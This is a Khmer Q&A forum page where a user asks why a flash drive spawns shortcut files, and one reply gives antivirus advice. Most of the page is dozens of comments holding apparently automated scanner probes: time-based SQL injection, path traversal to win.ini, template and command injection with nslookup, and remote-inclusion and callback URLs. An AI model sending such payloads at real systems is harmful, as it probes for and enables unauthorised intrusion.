៣០
វិច្ឆិកា

nikato

​ខ្ញុំ​ចង់សួរថាហេតុអ្វីបានជាComputerរបស់​ខ្ញុំ​ឲ្យ​តែពេលដោតFlash ឬ Card Reader ចូល ស្រាប់តែវា​បង្កើត​Shortcutដោយខ្លួនឯងចឹង???ឧទាហរណ៍​ខ្ញុំ​ដោតFlashចូលទៅ​ក្នុង​Computerរបស់​ខ្ញុំ ហើយនៅ​ក្នុង​FlashមានFolderផ្សេងៗ​ដូចជា​Videos ឬ My Musicជាដើម ។ ហើយ​នៅពេល​ដែល​ខ្ញុំ​ចុចបើកFolderនោះទៅ ស្រាប់តែវាមានShortcutនៅ​ក្នុង​នោះស្រាប់ ។ ឧទាហណ៍ My Music ពេលបើកទៅមាន My Music Shortcut នៅ​ក្នុង​នោះ ។

ចម្លើយ

Ouspheaktra Phal

បង​សាក​យក Flash នោះ ទៅ​ដោត​ក្នុង​កុំព្យូទ័រ​ផ្សេង បើ​កុំព្យូទ័រ​ផ្សេង​គ្មាន​បញ្ហា​ដូច​កុំព្យូទ័រ​បង​ទេ បញ្ហា​របស់​បង​បណ្ដាល​មក​ពី​កុំព្យូទ័រ​របស់​បង​មាន​មេរោគ ។ តែ​បើ​កុំព្យូទ័រ​ផ្សេងនោះ​មាន​បញ្ហា​ដូច​កុំព្យូទ័រ​បង ប្រហែល​ជា Flashរបស់​បង​មាន​មេរោគ ។ ដូចនេះ​បង​ត្រូវ​កម្ចាត់​មេរោគ​លើ Flash របស់​បង យល់​ល្អគួរ​តែ​កម្ចាត់​ទាំង​នៅ​ក្នុង​កុំព្យូទ័រ​របស់​បង​ផង ព្រោះ​មេរោគ​អាច​ចូល​ទៅ​លុកលុយ​កុំ​ព្យូទ័រ​របស់​បង​ហើយ ។ ហើយ​ឲ្យ​ប្រាកដ​ថា កម្មវិធី​ដែល​បង​ប្រើ​សម្រាប់​កម្ចាត់​មេរោគ​នោះ គឺ​ត្រូវ​បាន update ដល់ version ក្រោយ ពី​ព្រោះ​មេរោគ​ថ្មីៗ កម្មវិធី​ចាស់ៗ​មិន​អាច​ចាប់​បាន​ទេ ។

សំណាងល្អ

នៅថ្ងៃ

lgexxhrs

................windowswin.ini

នៅថ្ងៃ

lgexxhrs

;print (md5 (acunetix_wvs_security_test) ) ;

នៅថ្ងៃ

lgexxhrs

http://testasp.vulnweb.com/t/xss.html?%00.jpg

នៅថ្ងៃ

lgexxhrs

testasp.vulnweb.com

នៅថ្ងៃ

lgexxhrs

";print (md5 (acunetix_wvs_security_test) ) ;$a="

នៅថ្ងៃ

lgexxhrs

-1) ) ; waitfor delay '0:0:9' —

នៅថ្ងៃ

lgexxhrs

$ {@print (md5 (acunetix_wvs_security_test) ) }

នៅថ្ងៃ

lgexxhrs

1 waitfor delay '0:0:9' —

នៅថ្ងៃ

១០

lgexxhrs

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

នៅថ្ងៃ

១១

lgexxhrs

$ {@print (md5 (acunetix_wvs_security_test) ) } \

នៅថ្ងៃ

១២

lgexxhrs

c4FFZj1J'; waitfor delay '0:0:3' —

នៅថ្ងៃ

១៣

lgexxhrs

8Vqu7ygL') ; waitfor delay '0:0:3' —

នៅថ្ងៃ

១៤

lgexxhrs

-1;select pg_sleep (6) ; —

នៅថ្ងៃ

១៥

lgexxhrs

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

នៅថ្ងៃ

១៦

lgexxhrs

http://www.vulnweb.com

នៅថ្ងៃ

១៧

lgexxhrs

-1) ;select pg_sleep (6) ; —

នៅថ្ងៃ

១៨

lgexxhrs

1'" () &%

នៅថ្ងៃ

១៩

lgexxhrs

WEB-INF/web.xml

នៅថ្ងៃ

២០

lgexxhrs

vDCzDu2m') ) ;select pg_sleep (3) ; —

នៅថ្ងៃ

២១

lgexxhrs

{ {10000065*9999075} }

នៅថ្ងៃ

២២

lgexxhrs

1

នៅថ្ងៃ

២៣

lgexxhrs

(select (0) from (select (sleep (6) ) ) v) /*'+ (select (0) from (select (sleep (6) ) ) v) +'"+ (select (0) from (select (sleep (6) ) ) v) +"*/

នៅថ្ងៃ

២៤

lgexxhrs

http://testasp.vulnweb.com/t/fit.txt?.jpg

នៅថ្ងៃ

២៥

lgexxhrs

-1; waitfor delay '0:0:6' —

នៅថ្ងៃ

២៦

lgexxhrs

';print (md5 (acunetix_wvs_security_test) ) ;$a='

នៅថ្ងៃ

២៧

lgexxhrs

..\..\..\..\..\..\..\..\windows\win.ini

នៅថ្ងៃ

២៨

lgexxhrs

-1) ; waitfor delay '0:0:9' —

នៅថ្ងៃ

២៩

lgexxhrs

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

នៅថ្ងៃ

៣០

lgexxhrs

http://hitCfLAwyx3wb.bxss.me/

នៅថ្ងៃ

៣១

lgexxhrs

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

នៅថ្ងៃ

៣២

lgexxhrs

) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) )

នៅថ្ងៃ

៣៣

lgexxhrs

/www.vulnweb.com

នៅថ្ងៃ

៣៤

lgexxhrs

2C1zJAz3') ) ; waitfor delay '0:0:3' —

នៅថ្ងៃ

៣៥

lgexxhrs

//www.vulnweb.com

នៅថ្ងៃ

៣៦

lgexxhrs

/\www.vulnweb.com

នៅថ្ងៃ

៣៧

lgexxhrs

acux7039��z1��z2a�bcxuca7039

នៅថ្ងៃ

៣៨

lgexxhrs

response.write (9155135*9394863)

នៅថ្ងៃ

៣៩

lgexxhrs

set|set&set

នៅថ្ងៃ

៤០

lgexxhrs

$ (nslookup 4KHSTlgd)

នៅថ្ងៃ

៤១

lgexxhrs

'+response.write (9155135*9394863) +'

នៅថ្ងៃ

៤២

lgexxhrs

&nslookup jMAodD61&'\"`0&nslookup jMAodD61&`'

នៅថ្ងៃ

៤៣

lgexxhrs

"+response.write (9155135*9394863) +"

នៅថ្ងៃ

៤៤

lgexxhrs

../../../../../../../../../../windows/win.ini

នៅថ្ងៃ

៤៥

lgexxhrs

../../../../../../../../../../boot.ini

នៅថ្ងៃ

៤៦

lgexxhrs

$ {10000291+9999537}

នៅថ្ងៃ

៤៧

lgexxhrs

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

នៅថ្ងៃ

៤៨

lgexxhrs

../../../../../../../../../../windows/win.ini.jpg

នៅថ្ងៃ

៤៩

lgexxhrs

1&n964886=v960594

នៅថ្ងៃ

៥០

lgexxhrs

12345'"\'\") ;|] * { <>�''💩

នៅថ្ងៃ

៥១

lgexxhrs

1some_inexistent_file_with_long_name.jpg

នៅថ្ងៃ

៥២

lgexxhrs

������������������������������������������������windows��win.ini

នៅថ្ងៃ

៥៣

lgexxhrs

! ( () &&! |*|*|

នៅថ្ងៃ

៥៤

lgexxhrs

if (now () =sysdate () ,sleep (6) ,0) /*'XOR (if (now () =sysdate () ,sleep (6) ,0) ) OR'"XOR (if (now () =sysdate () ,sleep (6) ,0) ) OR"*/

នៅថ្ងៃ

៥៥

lgexxhrs

Http://testasp.vulnweb.com/t/fit.txt

នៅថ្ងៃ

៥៦

lgexxhrs

^ (#$! @#$) ( () ) ) ******

នៅថ្ងៃ

៥៧

lgexxhrs

-1) ) ;select pg_sleep (6) ; —

នៅថ្ងៃ

៥៨

lgexxhrs

'" () &%

នៅថ្ងៃ

៥៩

lgexxhrs

MyEQEhH7';select pg_sleep (9) ; —

នៅថ្ងៃ

៦០

lgexxhrs

(select convert (int,CHAR (65) ) )

នៅថ្ងៃ

៦១

lgexxhrs

WEB-INF\web.xml

នៅថ្ងៃ

៦២

lgexxhrs

V9ehBEdK') ;select pg_sleep (9) ; —

នៅថ្ងៃ

៦៣

lgexxhrs

acu4984<s1﹥s2ʺs3ʹuca4984

នៅថ្ងៃ

ចម្លើយរបស់អ្នក

សូមឆ្លើយចម្លើយ​ជាខ្មែរទៅនឹង​សំណួរខាងលើ ។

ដើម្បីអាចឆ្លើយតបនឹងសំណួរនេះ សូមឡុកចូលទៅគណនីរបស់អ្នកជាមុនសិនដោយចុចត្រង់នេះ

ឆ្លើយតាម Facebook